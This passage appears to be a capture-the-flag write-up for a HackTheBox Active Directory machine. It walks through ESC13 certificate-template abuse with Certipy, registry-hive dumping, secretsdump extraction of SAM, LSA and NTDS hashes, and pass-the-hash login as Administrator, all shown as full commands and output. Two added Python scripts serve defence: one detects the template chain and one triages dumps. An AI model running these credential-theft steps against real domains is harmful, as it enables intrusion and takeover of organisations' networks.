└─$ proxychains certipy-ad auth -pfx svc_cabackup.pfx -username 'svc_cabackup' -domain mist.htb -dc-ip 192.168.100.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:88  ...  OK
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:88  ...  OK
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

Hmm... Still can't authenticate with evil-winrm

Writeup-21.png
Writeup-22.png

Tried enumerating vulnerable certificate templates, but nothing showed up right off the bat.

└─$ proxychains certipy-ad find -username 'svc_cabackup@mist.htb' -dc-ip 192.168.100.100 -vulnerable -hashes ':c9872f1bc10bdd522c12fc2ac9041b64'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 14 enabled certificate templates
[*] Trying to get CA configuration for 'mist-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'mist-DC01-CA' via CSRA: Cant find a valid stringBinding to connect
[*] Trying to get CA configuration for 'mist-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'mist-DC01-CA'
[*] Saved BloodHound data to '20240718171248_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20240718171248_Certipy.txt'
[*] Saved JSON output to '20240718171248_Certipy.json'

ESC13 Abuse

Writeup-23.png

ESC13 requires a template with an issuance policy whose OID object carries an msDS-OIDToGroupLink to a group: when a certificate issued from that template is used for Kerberos authentication, the DC adds that group's SID to the ticket's PAC. In our case, the template ManagerAuthentication meets these requirements. We can check the conditions manually or use a scanning tool such as a patched branch of Certipy to verify this vulnerability. First, we use the account svc_cabackup along with its NTLM hash to request a new certificate from the ManagerAuthentication template against mist-DC01-CA.

We get an error when requesting a certificate:

└─$ proxychains certipy-ad req -u svc_cabackup -hashes c9872f1bc10bdd522c12fc2ac9041b64 -ca 'mist-DC01-CA' -template ManagerAuthentication -dc-ip 192.168.100.100 -dns-tcp -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:192.168.100.100[\pipe\cert]
[+] Connected to endpoint: ncacn_np:192.168.100.100[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 61
Would you like to save the private key? (y/N)
[-] Failed to request certificate

Certipy's default RSA key length is 2048 (from its help text: -key-size RSA key length, Length of RSA key. Default: 2048), so we request a larger key:

└─$ proxychains certipy-ad req -u svc_cabackup -hashes c9872f1bc10bdd522c12fc2ac9041b64 -ca 'mist-DC01-CA' -template ManagerAuthentication -dc-ip 192.168.100.100 -dns-tcp -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:192.168.100.100[\pipe\cert]
[+] Connected to endpoint: ncacn_np:192.168.100.100[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 66
[*] Got certificate with UPN 'svc_cabackup@mist.htb'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

└─$ proxychains certipy-ad auth -pfx svc_cabackup.pfx -username 'svc_cabackup' -domain mist.htb -dc-ip 192.168.100.100
[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

Now as user svc_cabackup, who just enrolled to ManagerAuthentication, we have become the Certificate Managers of the server. And we are now able to use template BackupSvcAuthentication which grants enrollment rights to MIST\CA Backup, which we figured it out through the adPEAS enumeration and BloodHound.

Continuing up the chain, we request a certificate from the BackupSvcAuthentication template as the Certificate Manager:

└─$ KRB5CCNAME=svc_cabackup.ccache proxychains -q certipy-ad req -k -no-pass -ca 'mist-DC01-CA' -template 'BackupSvcAuthentication' -dc-ip dc01.mist.htb -ns 192.168.100.100 -dns-tcp  -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Target name (-target) not specified and Kerberos or SSPI authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 69
[*] Got certificate with UPN 'svc_cabackup@mist.htb'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

We receive a new PFX issued from the BackupSvcAuthentication template; its private key can later be used to perform backup operations.

Repeat the authentication step, this time with the new PFX, against DC01:

└─$ proxychains -q certipy-ad auth -dc-ip 192.168.100.100 -pfx svc_cabackup.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

This yields a new TGT that carries the backup privilege (the NTLM hash is unchanged, since it is the same user).
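From the defender's side, the chain above (one account receiving certificates from ManagerAuthentication and then BackupSvcAuthentication within minutes) is visible in the CA's issuance audit events. The following added Python script (not part of the writeup or of Certipy) flags that pattern over a constructed, simplified rendering of Security event 4887; the template names are this box's, the requester names and timestamps are made up.

```python
"""Flag a privileged-template issuance chain in CA issuance logs.
Added example, not from the original writeup. Input is a constructed,
simplified rendering of Security event 4887 (Certificate Services issued a
certificate) as time|request_id|requester|template; template names are this
box's, the event lines and timestamps are made up."""
from collections import defaultdict
from datetime import datetime, timedelta

# Templates whose issuance should be rare and reviewed: a cert from
# ManagerAuthentication made svc_cabackup a Certificate Manager, which
# unlocked BackupSvcAuthentication and, through it, backup rights on the DC.
SENSITIVE_TEMPLATES = {"ManagerAuthentication", "BackupSvcAuthentication"}

# Constructed sample log, one issued certificate per line.
SAMPLE_LOG = """\
2024-07-10T19:20:01|61|MIST\\svc_cabackup|ManagerAuthentication
2024-07-10T19:21:40|66|MIST\\svc_cabackup|ManagerAuthentication
2024-07-10T19:24:05|69|MIST\\svc_cabackup|BackupSvcAuthentication
2024-07-10T19:30:00|70|MIST\\Florence.Brown|User
2024-07-11T09:00:00|71|MIST\\Harry.Beaucorn|BackupSvcAuthentication
"""

def parse_events(text):
    """Yield (time, request_id, requester, template); blank lines are skipped."""
    for line in text.splitlines():
        if line.strip():
            ts, rid, who, tmpl = line.split("|", 3)
            yield datetime.fromisoformat(ts), int(rid), who, tmpl

def find_template_chains(text, window=timedelta(hours=1)):
    """Map each requester issued certificates from two or more different
    sensitive templates within `window` to the sorted template names."""
    per_user = defaultdict(list)
    for ts, rid, who, tmpl in parse_events(text):
        if tmpl in SENSITIVE_TEMPLATES:
            per_user[who].append((ts, tmpl, rid))
    alerts = {}
    for who, issued in per_user.items():
        issued.sort()
        for i, (t0, tmpl0, _) in enumerate(issued):
            later = {t for t1, t, _ in issued[i + 1:] if t1 - t0 <= window}
            later.discard(tmpl0)
            if later:  # a second sensitive template within the window
                alerts[who] = sorted({tmpl0} | later)
                break
    return alerts

if __name__ == "__main__":
    for who, tmpls in find_template_chains(SAMPLE_LOG).items():
        print(f"ALERT {who}: certificates from {tmpls} issued within one hour")
```

A single sensitive issuance (Harry.Beaucorn in the sample) is not alerted on by itself; the signal is the same requester moving from one sensitive template to another.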

Registry Dump

With this TGT we can perform backup operations on the system. Use impacket-reg to save the registry hives (SAM, SYSTEM, SECURITY) to disk on DC01:

└─$ export KRB5CCNAME=svc_cabackup.ccache
proxychains -q impacket-reg 'mist.htb/svc_cabackup@dc01.mist.htb' -k -no-pass -dc-ip 192.168.100.100 save -keyName HKLM\\SAM -o 'C:\Users\op_Sharon.Mullard\Documents'
proxychains -q impacket-reg 'mist.htb/svc_cabackup@dc01.mist.htb' -k -no-pass -dc-ip 192.168.100.100 save -keyName HKLM\\system -o 'C:\Users\op_Sharon.Mullard\Documents'
proxychains -q impacket-reg 'mist.htb/svc_cabackup@dc01.mist.htb' -k -no-pass -dc-ip 192.168.100.100 save -keyName HKLM\\security -o 'C:\Users\op_Sharon.Mullard\Documents'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to C:\Users\op_Sharon.Mullard\Documents\SAM.save
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\system to C:\Users\op_Sharon.Mullard\Documents\system.save
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\security to C:\Users\op_Sharon.Mullard\Documents\security.save
└─$ proxychains -q evil-winrm -i 192.168.100.100 -u 'op_Sharon.Mullard' -p 'ImTiredOfThisJob:('
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> download SAM.save
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> download security.save
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> download system.save
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> exit

SAM Dump From Registry

Dump the hashes from registry hives:

└─$ impacket-secretsdump -sam SAM.save -system system.save -security security.save local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x47c7c97d3b39b2a20477a77d25153da5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e121bd371bd4bbaca21175947013dd7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesnt have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:c68cb851aa6312ad86b532db8103025cb80e69025bd381860316ba55b056b9e1248e7817ab7fc5b23c232a5bd2aa5b8515041dc3dc47fa4e2d4c34c7db403c7edc4418cf22a1b8c2c544c464ec9fedefb1dcdbebff68c6e9a103f67f3032b68e7770b4e8e22ef05b29d002cc0e22ad4873a11ce9bac40785dcc566d38bb3e2f0d825d2f4011b566ccefdc55f098c3b76affb9a73c6212f69002655dd7b774673bf8eecaccd517e9550d88e33677ceba96f4bc273e4999bbd518673343c0a15804c43fde897c9bd579830258b630897e79d93d0c22edc2f933c7ec22c49514a2edabd5d546346ce55a0833fc2d8403780
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260 # <--
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc78bf46f3d899c3922815140240178912cb2eb59
dpapi_userkey:0xc62a01b328674180712ffa554dd33d468d3ad7b8
[*] NL$KM
 0000   C4 C5 BF 4E A9 98 BD 1B  77 0E 76 A1 D3 09 4C AB   ...N....w.v...L.
 0010   B6 95 C7 55 E8 5E 4C 48  55 90 C0 26 19 85 D4 C2   ...U.^LHU..&....
 0020   67 D7 76 64 01 C8 61 B8  ED D6 D1 AF 17 5E 3D FC   g.vd..a......^=.
 0030   13 E5 4D 46 07 5F 2B 67  D3 53 B7 6F E6 B6 27 31   ..MF._+g.S.o..'1
NL$KM:c4c5bf4ea998bd1b770e76a1d3094cabb695c755e85e4c485590c0261985d4c267d7766401c861b8edd6d1af175e3dfc13e54d46075f2b67d353b76fe6b62731
[*] Cleaning up...

However, the hashes extracted from the local SAM (Security Accounts Manager) database can generally be used to authenticate locally but are often not sufficient for remote logons: they are not domain-level credentials and carry no domain permissions, and Microsoft's guidance is to block remote use of local accounts.

In such cases we can still use the hashes of domain users, which come from the cached domain logon information. The machine account hash (here DC01$) is more powerful still, since it can authenticate to the domain controller and thereby reach domain resources.
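To sort a dump like the ones on this page into local SAM entries, domain entries and machine accounts, and to flag empty passwords and the secrets that must be rotated first, here is an added Python triage script (not part of the writeup or of Impacket); the hash lines it parses are constructed samples in Impacket's output format.

```python
"""Triage a secretsdump-style dump: local SAM vs domain entries, machine
accounts, empty passwords and which secrets to rotate first. Added example,
not part of the writeup or of Impacket; the line format (user:rid:lm:nt:::)
is Impacket's, the sample entries below are constructed with made-up hashes."""
import re

# Well-known constants: the empty LM hash and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

# Constructed sample: a local SAM dump followed by a domain (NTDS) dump.
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000002:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000003:::
svc_cabackup:1135:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000004:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000005:::
"""

def classify(user, rid):
    """krbtgt, machine (trailing $), builtin-admin (RID 500) or user."""
    if user.lower() == "krbtgt":
        return "krbtgt"
    return "machine" if user.endswith("$") else "builtin-admin" if rid == 500 else "user"

def triage(dump):
    """Return one dict per hash line: user, scope (local/domain), kind, flags."""
    scope, out = None, []
    for line in dump.splitlines():
        if "Dumping local SAM hashes" in line:
            scope = "local"  # following lines are host-local accounts
        elif "Dumping Domain Credentials" in line:
            scope = "domain"  # following lines come from NTDS.DIT
        m = LINE_RE.match(line)
        if not m or scope is None:
            continue
        kind, flags = classify(m["user"], int(m["rid"])), []
        if m["nt"] == EMPTY_NT:
            flags.append("empty-password")
        if m["lm"] != EMPTY_LM:
            flags.append("lm-hash-stored")  # LM hashes are trivially crackable
        if scope == "domain" and kind != "user":
            flags.append("rotate-first")  # krbtgt, machine and domain admin secrets
        out.append({"user": m["user"], "scope": scope, "kind": kind, "flags": flags})
    return out
```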

SAM Dump From Local Account NTLM

Having extracted the machine account hash, we can either use it to obtain a Kerberos ticket or re-run secretsdump against DC01 with the DC01$ hash:

└─$ proxychains -q impacket-secretsdump 'mist.htb/dc01$@dc01.mist.htb' -hashes ':e768c4cf883a87ba9e96278990292260' -target-ip dc01.mist.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b46782b9365344abdff1a925601e0385:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:298fe98ac9ccf7bd9e91a69b8c02e86f:::
Sharon.Mullard:1109:aad3b435b51404eeaad3b435b51404ee:1f806175e243ed95db55c7f65edbe0a0:::
Brandon.Keywarp:1110:aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9:::
Florence.Brown:1111:aad3b435b51404eeaad3b435b51404ee:9ee69a8347d91465627365c41214edd6:::
Jonathan.Clinton:1112:aad3b435b51404eeaad3b435b51404ee:165fbae679924fc539385923aa16e26b:::
Markus.Roheb:1113:aad3b435b51404eeaad3b435b51404ee:74f1d3e2e40af8e3c2837ba96cc9313f:::
Shivangi.Sumpta:1114:aad3b435b51404eeaad3b435b51404ee:4847f5daf1f995f14c262a1afce61230:::
Harry.Beaucorn:1115:aad3b435b51404eeaad3b435b51404ee:a3188ac61d66708a2bd798fa4acca959:::
op_Sharon.Mullard:1122:aad3b435b51404eeaad3b435b51404ee:d25863965a29b64af7959c3d19588dd7:::
op_Markus.Roheb:1123:aad3b435b51404eeaad3b435b51404ee:73e3be0e5508d1ffc3eb57d48b7b8a92:::
svc_smb:1125:aad3b435b51404eeaad3b435b51404ee:1921d81fdbc829e0a176cb4891467185:::
svc_cabackup:1135:aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260:::
MS01$:1108:aad3b435b51404eeaad3b435b51404ee:a71b31073d75b3832c1eb3026fb12d48:::
svc_ca$:1124:aad3b435b51404eeaad3b435b51404ee:34956e4924985c2f1b7ba808cd54bcb8:::
[*] Kerberos keys grabbed
[*] Cleaning up...

Admin Auth On DC01

└─$ proxychains -q evil-winrm -i 192.168.100.100 -u 'Administrator' -H 'b46782b9365344abdff1a925601e0385'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> tree /f /a
Folder PATH listing
Volume serial number is 169A-FA3E
C:.
+---Desktop
|       root.txt
+---Documents
|   \---WindowsPowerShell
|       \---Scripts
|           \---InstalledScriptInfos
+---Downloads
+---Music
|       cleanup.ps1
|       flagrotate.ps1
|       startup.ps1
|       whisker.exe

Root.txt

*Evil-WinRM* PS C:\Users\Administrator> cat Desktop/root.txt
bd07f9a54257844a9fac9d5ade582810

Admin Scripts

*Evil-WinRM* PS C:\Users\Administrator\music> cat cleanup.ps1
C:\users\administrator\music\whisker.exe clear /target:ms01$
C:\users\administrator\music\whisker.exe add /target:ms01$

*Evil-WinRM* PS C:\Users\Administrator\music> cat flagrotate.ps1
Enable-VMIntegrationService -Name "Guest Service Interface" -VMName "MS01"
Copy-VMFile -VMName 'MS01' -SourcePath "C:\Users\brandon.keywarp\Desktop\user.txt" -DestinationPath "C:\Users\Administrator\Desktop\user.txt" -FileSource Host -Force

*Evil-WinRM* PS C:\Users\Administrator\music> cat startup.ps1
$vm_name = "MS01"
get-vm -name $vm_name | Stop-VM
Set-VMProcessor $vm_name -CompatibilityForMigrationEnabled $true
Start-VM -name $vm_name
